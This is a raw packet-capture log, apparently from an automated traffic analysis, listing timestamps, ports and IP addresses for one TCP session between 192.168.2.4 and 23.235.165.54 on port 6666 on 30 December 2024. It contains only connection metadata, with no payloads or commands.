Dec 30, 2024 23:12:23.617136955 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.617147923 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.617150068 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.617196083 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.617451906 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.617463112 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.617475033 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.617490053 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.617499113 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.617526054 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.827689886 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.827702999 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.827748060 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.827801943 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.827815056 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.827826023 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.827836037 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.827847004 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.827862978 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.827888012 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.828505993 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.828519106 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.828528881 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.828545094 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.828555107 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.828556061 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.828562975 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.828597069 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.829375982 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.829392910 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.829441071 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.038168907 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.038182974 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.038194895 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.038206100 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.038234949 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.038263083 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.038413048 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.038431883 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.038443089 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.038455009 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.038466930 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.038471937 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.038506031 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.039346933 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.039357901 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.039369106 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.039383888 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.039395094 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.039397001 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.039422035 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.039434910 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.040040016 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.040050983 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.040069103 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.040079117 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.040085077 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.040107965 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.040119886 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.040842056 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.040853024 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.040865898 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.040877104 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.040878057 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.040901899 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.092761040 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.249001026 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249017954 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249028921 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249047995 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249059916 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249084949 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.249140978 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.249260902 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249279022 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249289989 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249300003 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249310970 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249316931 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.249370098 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.249370098 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.249780893 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249792099 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249809027 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249825954 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249829054 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.249836922 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249849081 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249860048 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.249871969 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.249901056 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.250580072 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.250591040 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.250607967 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.250619888 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.250628948 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.250633001 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.250644922 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.250653982 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.250658989 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.250704050 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.250704050 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.251621008 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.251632929 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.251643896 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.251653910 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.251663923 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.251673937 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.251678944 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.251687050 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.251698971 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.251715899 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.251759052 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.252624989 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.252636909 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.252648115 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.252657890 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.252669096 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.252676964 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.252681017 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.252693892 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.252703905 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.252707005 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.252731085 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.253437996 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.253473043 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.253499031 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.295881987 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.459669113 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459683895 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459695101 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459707022 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459717989 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459729910 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459739923 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459750891 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459758997 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.459804058 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.459804058 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.459841013 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459872007 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459992886 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.459992886 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.460004091 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460021973 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460032940 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460043907 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460047960 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.460055113 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460069895 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460079908 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460092068 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460094929 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.460119009 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.460119009 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.460633039 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460649967 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460660934 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460671902 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460684061 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460685015 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.460694075 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.460696936 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460722923 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.460751057 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460762024 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460772991 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460789919 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460802078 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460812092 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460817099 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.460827112 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.460844994 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.461025000 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.461675882 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.461687088 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.461699009 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.461708069 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.461719036 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.461729050 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.461739063 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.461745024 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.461750031 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.461765051 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.461822987 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.462193966 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462204933 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462217093 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462233067 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462243080 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462253094 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462264061 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462266922 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.462291956 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.462352991 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.462352991 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462367058 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462378025 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462389946 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462399960 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462412119 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.462428093 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.462439060 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.463241100 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463252068 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463263035 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463273048 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463289976 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463299036 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.463299990 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463318110 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463330030 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463341951 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463344097 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.463352919 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463365078 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463365078 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.463372946 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.463376999 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463392019 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.463402033 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.463808060 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.464134932 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.464145899 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.464157104 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.464168072 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.464190960 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.464229107 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.669975042 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670013905 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670032978 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670053005 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670063972 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670074940 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670087099 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670094013 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670103073 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670104027 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670115948 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670142889 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670157909 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670170069 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670176029 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670182943 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670222998 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670232058 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670243979 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670284986 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670289993 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670308113 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670319080 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670329094 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670340061 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670340061 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670372009 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670412064 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670579910 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670622110 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670633078 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670676947 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670686960 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670697927 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670722961 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670902014 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670913935 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670924902 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670953035 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670953035 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.670964003 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670975924 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.670985937 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671004057 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671014071 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671015024 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671029091 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671029091 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671051979 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671350002 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671361923 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671371937 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671396971 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671400070 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671408892 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671420097 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671425104 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671432018 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671458006 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671487093 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671498060 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671509981 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671525955 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671526909 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671540022 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671566963 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671582937 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671595097 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671597004 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671607971 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671619892 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671621084 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671633005 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671643972 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671647072 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671654940 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.671672106 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.671736956 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.674900055 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.675107956 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.675276041 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.675287008 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.675287962 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.675333023 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.675466061 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.675497055 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.675508022 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.675533056 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.675874949 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.676002979 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.676013947 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.676027060 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.676038027 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.676135063 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.676163912 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.676275969 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.676769018 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.676779985 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.676790953 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.676804066 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.676814079 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.676815033 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.676861048 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.679495096 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679507971 CET	6666	49736	23.235.165.54	192.168.2.4
